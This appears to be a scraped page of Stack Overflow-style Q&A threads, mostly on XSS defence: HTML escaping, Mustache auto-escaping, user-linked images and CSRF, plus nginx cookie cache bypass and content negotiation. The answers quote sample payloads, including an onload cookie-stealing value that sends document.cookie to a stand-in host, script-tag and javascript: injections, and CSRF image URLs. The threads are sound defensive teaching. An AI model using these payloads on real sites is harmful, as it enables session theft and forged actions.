Is replacing : < and > with < and > enough to prevent XSS injection?

Is replacing : < and > with < and > enough to prevent XSS injection? - xss

I want to know if entiting the two marks < and > is enough to prevent XSS injections?
And if not, why? And what's the best solution?

It depends very much on context.
Check out this example, from a typical forum site...
You may hotlink your avatar image. Enter the full URL.
Malicious user enters in input field
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There is no encoding there of less than and greater than, but still a big security hole.
With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.

You should also take doublequotes ", singlequotes ' and ampersands & into account. If you do that all during displaying/generating the output, then yes, it's enough.
You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which is been stored in a datastore.
In PHP you can do that with htmlspecialchars() and in JSP cou can do that with JSTL <c:out>.

Related

Ignoring cookies list efficiently in NGINX reverse proxy setup

I am currently working/testing microcache feature in NGINX reverse proxy setup for dynamic content.
One big issue that occurs is sessions/cookies that need to be ignored otherwise people will logon with random accounts on the site(s).
Currently I am ignoring popular CMS cookies like this:
if ($http_cookie ~* "(joomla_[a-zA-Z0-9_]+|userID|wordpress_(?!test_)[a-zA-Z0-9_]+|wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+|comment_author_[a-zA-Z0-9_]+|woocommerce_cart_hash|woocommerce_items_in_cart|wp_woocommerce_session_[a-zA-Z0-9]+|sid_customer_|sid_admin_|PrestaShop-[a-zA-Z0-9]+")
{
# set ignore variable to 1
# later used in:
# proxy_no_cache $IGNORE_VARIABLE;
# proxy_cache_bypass $IGNORE_VARIABLE;
# makes sense ?
}
However this becomes a problem if I want to add more cookies to the ignore list. Not to mention that using too many "if" statements in NGINX is not recommended as per the docs.
My questions is, if this could be done using a map method ? I saw that regex in map is different( or maybe I am wrong ).
Or is there another way to efficiently ignore/bypass cookies ?
I have search a lot on stackoverflow, and whilst there are so many different examples; I could not find something specific for my needs.
Thank you
Update:
A lot of reading and "digging" on the internet ( we might as well just say Google ), and I found quite some interesting examples.
However I am very confused with these, as I do not fully understand the regex usage and I am afraid to implement such without understanding it.
Example 1:
map $http_cookie $cache_uid {
default nil;
~SESS[[:alnum:]]+=(?<session_id>[[:alnum:]]+) $session_id;
}
In this example I can notice that the regex is very different from
the ones used in "if" blocks. I don't understand why the pattern
starts without any "" and directly with just a ~ sign.
I don't understand what does [[:alnum:]]+ mean ? I search for this
but I was unable to find documentation. ( or maybe I missed it )
I can see that the author was setting "nil" as default, this will
not apply for my case.
Example 2:
map $http_cookie $cache_uid {
default '';
~SESS[[:alnum:]]+=(?<session_id>[[:graph:]]+) $session_id;
}
Same points as in Example 1, but this time I can see [[:graph:]]+.
What is that ?
My Example (not tested):
map $http_cookie $bypass_cache {
"~*wordpress_(?!test_)[a-zA-Z0-9_]+" 1;
"~*wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+" 1;
"~*comment_author_[a-zA-Z0-9_]+" 1;
"~*[a-zA-Z0-9]+_session)" 1;
default 0;
}
In my pseudo example, the regex must be wrong since I did not find any map cookie examples with such regex.
So once again my goal is to have a map style list of cookies that I can bypass the cache for, with proper regex.
Any advice/examples much appreciated.

What exactly are you trying to do?
The way you're doing it, by trying to blacklist only certain cookies from being cached, through if ($http_cookie …, is a wrong approach — this means that one day, someone will find a cookie that is not blacklisted, and which your backend would nonetheless accept, and cause you cache poisoning or other security issues down the line.
There's also no reason to use the http://nginx.org/r/map approach to get the values of the individual cookies, either — all of this is already available through the http://nginx.org/r/$cookie_ paradigm, making the map code for parsing out $http_cookie rather redundant and unnecessary.
Are there any cookies which you actually want to cache? If not, why not just use proxy_no_cache $http_cookie; to disallow caching when any cookies are present?
What you'd probably want to do is first have a spec of what must be cached and under what circumstances, only then resorting to expressing such logic in a programming language like nginx.conf.
For example, a better approach would be to see which URLs should always be cached, clearing out the Cookie header to ensure that cache poisoning isn't possible (proxy_set_header Cookie "";). Else, if any cookies are present, it may either make sense to not cache anything at all (proxy_no_cache $http_cookie;), or to structure the cache such that certain combination of authentication credentials are used for http://nginx.org/r/proxy_cache_key; in this case, it might also make sense to reconstruct the Cookie request header manually through a whitelist-based approach to avoid cache-poisoning issues.

You 2nd example that you have is what you actually need
map $http_cookie $bypass_cache {
"~*wordpress_(?!test_)[a-zA-Z0-9_]+" 1;
"~*wp-postpass|wordpress_logged_in_[a-zA-Z0-9]+" 1;
"~*comment_author_[a-zA-Z0-9_]+" 1;
"~*[a-zA-Z0-9]+_session)" 1;
default 0;
}
Basically here what you are saying the bypass_cache value will be 1 if the regex is matched else 0.
So as long as you got the pattern right, it will work. And that list only you can have, since you would only know which cookies to bypass cache on

Is Mustache XSS-proof?

I was thinking about my app's XSS vulnerability. On the server side I don't sanitize either input or output, so
<script>alert(document.cookies)</script>
is stored in database exactly so. To view this value on the client side I use Mustache. If this script was executed by an admin, it is of course easy to hijack his session. However I've noticed that Mustache by default escapes these values & \ " < > when you use the {{}} syntax. Do I need to worry about XSS, when the value from the database would be inserted into
<p>{{value}}</p>
or even
<p data-id='{{value}}'>something</p>
? Should I perhaps review my Mustache templates to look for any vulnerable code, or unless I'd use
<script>{{value}}</script>
I am safe?

Well, you should always worry :) But yes, Mustache accomplishes the goal you are talking about here, protecting your examples from XSS (except where you're outputting the value directly into a <script> tag).
Note: check that the Mustache implementation you're using escapes single quotes. It's apparently not in the spec to do so (https://github.com/mustache/spec/issues/69) but the major implementations thankfully escape it anyway.

Externally linked images - How to prevent cross site scripting

On my site, I want to allow users to add reference to images which are hosted anywhere on the internet. These images can then be seen by all users of my site. As far as I understand, this could open the risk of cross site scripting, as in the following scenario:
User A adds a link to a gif which he hosts on his own webserver. This webserver is configured in such a way, that it returns javascript instead of the image.
User B opens the page containg the image. Instead of seeing the image, javascript is executed.
My current security messures are currently such, that both on save and open, all content is encoded.
I am using asp.net(c#) on the server and a lot of jquery on the client to build ui elements, including the generation of image tags.
Is this fear of mine correct? Am I missing any other important security loopholes here? And most important of all, how do I prevent this attack? The only secure way I can think of right now, is to webrequest the image url on the server and check if it contains anything else than binary data...

Checking the file is indeed an image won't help. An attacker could return one thing when the server requests and another when a potential victim makes the same request.
Having said that, as long as you restrict the URL to only ever be printed inside the src attribute of an img tag, then you have a CSRF flaw, but not an XSS one.
Someone could for instance create an "image" URL along the lines of:
http://yoursite.com/admin/?action=create_user&un=bob&pw=alice
Or, more realistically but more annoyingly; http://yoursite.com/logout/
If all sensitive actions (logging out, editing profiles, creating posts, changing language/theme) have tokens, then an attack vector like this wouldn't give the user any benefit.
But going back to your question; unless there's some current browser bug I can't think of you won't have XSS. Oh, remember to ensure their image URL doesn't include odd characters. ie: an image URL of "><script>alert(1)</script><!-- may obviously have bad effects. I presumed you know to escape that.

Your approach to security is incorrect.
Don't approach the topic as "I have a user input, so how can I prevent XSS". Rather approach it like it this: "I have user input - it should be restrictive as possible - i.e. allowing nothing through". Then based on that allow only what's absolutely essential - plain-text strings thoroughly sanitized to prevent anything but a URL, and the specific, necessary characters for URLS only. Then Once it is sanitized I should only allow images. Testing for that is hard because it can be easily tricked. However, it should still be tested for. Then because you're using an input field you should make sure that everything from javascript scripts and escape characters, HTML, XML and SQL injections are all converted to plaintext and rendered harmless and useless. Consider your users as being both idiots and hackers - that they'll input everything incorrectly and try to hack something into your input space.
Aside from that you may run into som legal issues with regard to copyright. Copyrighted images generally may not be used on other people's sites without the copyright owner's consent and permission - usually obtained in writing (or email). So allowing users the opportunity to simply lift images from a site could run the risk of allowing them to take copyrighted material and reposting it on your site without permission which is illegal. Some sites are okay with citing the source, others require a fee to be paid, and others will sue you and bring your whole domain down for copyright infringement.

Best way to decide on XML or HTML response?

I have a resource at a URL that both humans and machines should be able to read:
http://example.com/foo-collection/foo001
What is the best way to distinguish between human browsers and machines, and return either HTML or a domain-specific XML response?
(1) The Accept type field in the request?
(2) An additional bit of URL? eg:
http://example.com/foo-collection/foo001 -> returns HTML
http://example.com/foo-collection/foo001?xml -> returns, er, XML
I do not wish to oblige machines reading the resource to parse HTML (or XHTML for that matter). Machines like the googlebot should receive the HTML response.
It is reasonable to assume I control the machine readers.

If this is under your control, rather than adding a query parameter why not add a file extension:
http://example.com/foo-collection/foo001.html - return HTML
http://example.com/foo-collection/foo001.xml - return XML
Apart from anything else, that means if someone fetches it with wget or saves it from their browser, it'll have an appropriate filename without any fuss.

My preference is to make it a first-class part of the URI. This is debatable, since there are -- in a sense -- multiple URI's for the same resource. And is "format" really part of the URI?
http://example.com/foo-collection/html/foo001
http://example.com/foo-collection/xml/foo001
These are very easy deal with in a web framework that has URI parsing to direct the request to the proper application.

If this is indeed the same resource with two different representations, the HTTP invites you to use the Accept-header as you suggest. This is probably a very reliable way to distinguish between the two different scenarios. You can be plenty sure that user agents (including search engine spiders) send the Accept-header properly.
About the machine agents you are going to give XML; are they under your control? In that case you can be doubly sure that Accept will work. If they do not set this header properly, you can give XML as default. User agents DO set the header properly.
I would try to use the Accept heder for this, because this is exactly what the Accept header is there for.
The problem with having two different URLs is that is is not automatically apparent that these two represent the same underlying resource. This can be bad if a user finds an URL in one program, which renders HTML, and pastes it in the other, which needs XML. At this point a smart user could probably change the URL appropriately, but this is just a source of error that you don't need.

I would say adding a Query String parameter is your best bet. The only way to automatically detect whether your client is a browser(human) or application would be to read the User-Agent string from the HTTP Request. But this is easily set by any application to mimic a browser, you're not guaranteed that this is going to work.

How do you allow the usage of an <img> while preventing XSS?

I'm using ASP.NET Web Forms for blog style comments.
Edit 1: This looks way more complicated then I first thought. How do you filter the src?
I would prefer to still use real html tags but if things get too complicated that way, I might go a custom route. I haven't done any XML yet, so do I need to learn more about that?

If IMG is the only thing you'd allow, I'd suggest you use a simple square-bracket syntax to allow it. This would eliminate the need for a parser and reduce a load of other dangerous edge cases with the parser as well. Say, something like:
Look at this! [http://a.b.c/m.jpg]
Which would get converted to
Look at this! <img src="http://a.b.c/m.jpg" />
You should filter the SRC address so that no malicious things get passed in the SRC part too. Like maybe
Look at this! [javascript:alert('pwned!')]

Use an XML parser to validate your input, and drop or encode all elements, and attributes, that you do not want to allow. In this case, delete or encode all tags except the <img> tag, and all attributes from that except src, alt and title.

If you end up going with a non-HTML format (which makes things easier b/c you can literally escape all HTML), use a standard syntax like markdown. The markdown image syntax is ![alt text](/path/to/image.jpg)
There are others also, like Textile. Its syntax for images is !imageurl!

#chakrit suggested using a custom syntax, e.g. bracketed URLs - This might very well be the best solution. You DEFINITELY dont want to start messing with parsing etc.
Just make sure you properly encode the entire comment (according to the context - see my answer on this here Will HTML Encoding prevent all kinds of XSS attacks?)
(btw I just discovered a good example of custom syntax right there... ;-) )
As also mentioned, restrict the file extension to jpg/gif/etc - even though this can be bypassed, and also restrict the protocol (e.g. http://).
Another issue to be considered besides XSS - is CSRF (http://www.owasp.org/index.php/Cross-Site_Request_Forgery). If you're not familiar with this security issue, it basically allows the attacker to force my browser to submit a valid authenticated request to your application, for instance to transfer money or to change my password. If this is hosted on your site, he can anonymously attack any vulnerable application - including yours. (Note that even if other applications are vulnerable, its not your fault they get attacked, but you still dont want to be the exploit host or the source of the attack...). As far as your own site goes, it's that much easier for the attacker to change the users password on your site, for instance.

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js